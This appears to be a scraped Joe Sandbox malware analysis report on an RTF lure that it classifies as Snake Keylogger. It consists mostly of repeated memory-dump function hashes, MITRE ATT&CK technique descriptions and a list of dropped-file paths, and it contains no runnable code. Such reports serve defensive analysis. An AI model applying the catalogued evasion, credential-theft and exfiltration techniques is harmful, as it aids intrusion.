Uniqueness Score: -1.00%

Function 005F7558 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F7633

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3d9a0db8c805fe5ca0a6e1624f24afc1ffc297deba19c5a10d21da577335517e
Instruction ID: 6af1a22270918606f96b25f8a383953d2b1ab6280da7bfe3c486b54dff8ba238
Opcode Fuzzy Hash: 3d9a0db8c805fe5ca0a6e1624f24afc1ffc297deba19c5a10d21da577335517e
Instruction Fuzzy Hash: A5410670D04248CBDB18DFAAC5546AEFBF2AF89300F24D12AD514AB359DB345945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 005F7E09 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F7EE3

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 233810aa193c1d993d6ebaef49a473e267c2016db1b67a6e4bc551d0952f8033
Instruction ID: fdd2ae6148ecec193dbecd3ea0e7dd36e60a96863e173973f1dd4ae5155cf68f
Opcode Fuzzy Hash: 233810aa193c1d993d6ebaef49a473e267c2016db1b67a6e4bc551d0952f8033
Instruction Fuzzy Hash: CD41E470E00208CBDB18DFAAC9416EEBBF2BF89304F24D12AD514AB355DB345945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 005F0490 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F056B

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: dca85b76e26656dfd5c4eb70c62b707e42e0572d6972ea6ca65f31879d4a44b8
Instruction ID: 832aa7f447d7c7f340a7e47d1d1d5e858d3d9bcd8b3bf649c46a13f7261d1858
Opcode Fuzzy Hash: dca85b76e26656dfd5c4eb70c62b707e42e0572d6972ea6ca65f31879d4a44b8
Instruction Fuzzy Hash: D441D570E01208CBDB18DFAAC5446AEFBF2BF89304F24D12AD514AB395DB345945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 005F1A4A Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F1B23

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 996f7b8f8d95e09465aa8f1df8c41a0780ff17135acfc607c7e0a154db37e753
Instruction ID: 594f391521f70506211477d2e37d394eccab5fb90af13ffa6f52aaf2d575407f
Opcode Fuzzy Hash: 996f7b8f8d95e09465aa8f1df8c41a0780ff17135acfc607c7e0a154db37e753
Instruction Fuzzy Hash: F641F670E00608CBEB18DFAAD5416EEBBF2AF88300F24C12AD514BB369DB345946CF44

Uniqueness

Uniqueness Score: -1.00%

Function 005F7106 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F71DC

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c7cbee2d79dff07aada8841ce14077d3d7afc6cc884cb2c445e7176bdcdc58de
Instruction ID: 8558254c08a0da756bc1aa1de698984ddbae9a62895e72d75f6dcc8f6c961ea2
Opcode Fuzzy Hash: c7cbee2d79dff07aada8841ce14077d3d7afc6cc884cb2c445e7176bdcdc58de
Instruction Fuzzy Hash: B841F274E05208CFDB18DFAAD9406AEBBF2BF89304F24D12AD514AB269EB345945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 005F1198 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F1273

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ebdb60b07cad5a35800765c048428ff199a1caaf3bce9912afae3438b509a10b
Instruction ID: 9ded2bab823b4a5227a1679aaa896b4891c7825a0e7841307e9977abb4606c5b
Opcode Fuzzy Hash: ebdb60b07cad5a35800765c048428ff199a1caaf3bce9912afae3438b509a10b
Instruction Fuzzy Hash: 7A41D470E01608CBDB18DFAAC5546EEBBF2AF89300F24C12AD515BB369DB344946CF54

Uniqueness

Uniqueness Score: -1.00%

Function 005F56D0 Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F57A3

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9e5e3e5ad89b8bccca16120ab8617a9d49f4126770deec377b2f2a9234bcfc55
Instruction ID: 440ea478c23bdfb271d27a62eea39bb4743e389a16444cd750c256a32ff1728a
Opcode Fuzzy Hash: 9e5e3e5ad89b8bccca16120ab8617a9d49f4126770deec377b2f2a9234bcfc55
Instruction Fuzzy Hash: 0741D370E05608CFDB18DFAAD5446AEFBF2AF89300F24C12AD514AB259EB345945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 005F0D41 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F0E1B

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 135f8fe6ed1345624a381e60ffc2b4f8ac5de63e88a271a4b35a397be5cdb1bc
Instruction ID: a4804ddbe1c0ef1c6434d4b82d86185c11ca61e1889d094c80d5740d9d93e014
Opcode Fuzzy Hash: 135f8fe6ed1345624a381e60ffc2b4f8ac5de63e88a271a4b35a397be5cdb1bc
Instruction Fuzzy Hash: 2C410570E05608CBDB18DFAAC9406AEBBF2BF89300F24D12AD514BB369DB344945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 005F8F69 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F9043

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ea5f2d3b56171eaf78868d6eb9d442e9e3614699afd4bc58d6be8e4082475b2f
Instruction ID: 7392d541f98c4129614abd7c33a2078df1f749f4bb1916ae80fc972e4334180f
Opcode Fuzzy Hash: ea5f2d3b56171eaf78868d6eb9d442e9e3614699afd4bc58d6be8e4082475b2f
Instruction Fuzzy Hash: E341F570E00608CBDB18DFAAC9546EEBBF2AF89304F24C12AD514BB3A5DB384945CF44

Uniqueness

Uniqueness Score: -1.00%

Function 005F15F1 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F16CB

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 95c8026c18b9ad373079318d85b607b83c769b6bd06b48b3e37b7b8f15ba311e
Instruction ID: 8b955c5f4c23f7f43d32fbab79f3df8dd9a18a93872708e5f4c6ff9b8f5a2f23
Opcode Fuzzy Hash: 95c8026c18b9ad373079318d85b607b83c769b6bd06b48b3e37b7b8f15ba311e
Instruction Fuzzy Hash: 3241F470E01608CBEB18DFAAC5506AEBBB2AF89300F24D12AD514BB3A9DB344945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 005F8B1A Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 005F8BEB

Memory Dump Source

Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_5f0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c5bc67b0f0d08fb1bebdaee80d51e62b14c709ed91819fc5b866f7755fa5d7e3
Instruction ID: 5439c71f6c2dbc92b7e68eb0fc317a4e6207bfbe5deadae00fc54ff1be465489
Opcode Fuzzy Hash: c5bc67b0f0d08fb1bebdaee80d51e62b14c709ed91819fc5b866f7755fa5d7e3
Instruction Fuzzy Hash: 2641C270E01208CBEB18DFAAD9406AEFBB2BF89304F24D12AD514BB369DB345945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0025BBF8 Relevance: 1.6, APIs: 1, Instructions: 124COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL(000000FF), ref: 0025BD5A

Memory Dump Source

Source File: 00000022.00000002.1276328413.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_250000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3b0dfebf0670aa7ff3089975a92938a06624091a92535124c79ad276e74b57a5
Instruction ID: 55ad9c218f773ae8ab8534872ff6afe3369e5110078bbcdd39bb77fe19618e26
Opcode Fuzzy Hash: 3b0dfebf0670aa7ff3089975a92938a06624091a92535124c79ad276e74b57a5
Instruction Fuzzy Hash: A85112B4D11208CFDB18CFAAD4486DDFBB2BF89315F24C12AE814AB294DB749949CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0025BD93 Relevance: 1.6, APIs: 1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.1276328413.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_250000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22cf4308231af1b92d99fb8e48fbcbe75d112992187f5e1e7a7f9b301de40803
Instruction ID: ff1e21b6e710379c128f5df3a088cfd01eed4d91b0ac7ee74a3280d780c765ef
Opcode Fuzzy Hash: 22cf4308231af1b92d99fb8e48fbcbe75d112992187f5e1e7a7f9b301de40803
Instruction Fuzzy Hash: A65130B4D11208CFCF15CFA9D484AECBBB1BF49326F249529E815BB290D7749889CF18

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Revised sales contract for Crosswear.rtf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\80127298.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FBB61633.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F2385FB8-B924-43C9-BEC5-65FAE5403308}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{259EE6F9-0934-45E6-98B2-0071567418FD}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5C8D69A0-CC71-4B83-AF64-7D30251F3853}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{97484890-462A-40AF-968F-F7AFE2F9A970}.tmp

C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT

C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT:Zone.Identifier

C:\Users\user\AppData\Local\Temp\tmp430A.tmp

C:\Users\user\AppData\Local\Temp\tmpA5B2.tmp

C:\Users\user\AppData\Local\Temp\tmpEFF.tmp

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Revised sales contract for Crosswear.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Windows Analysis Report
Revised sales contract for Crosswear.rtf

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre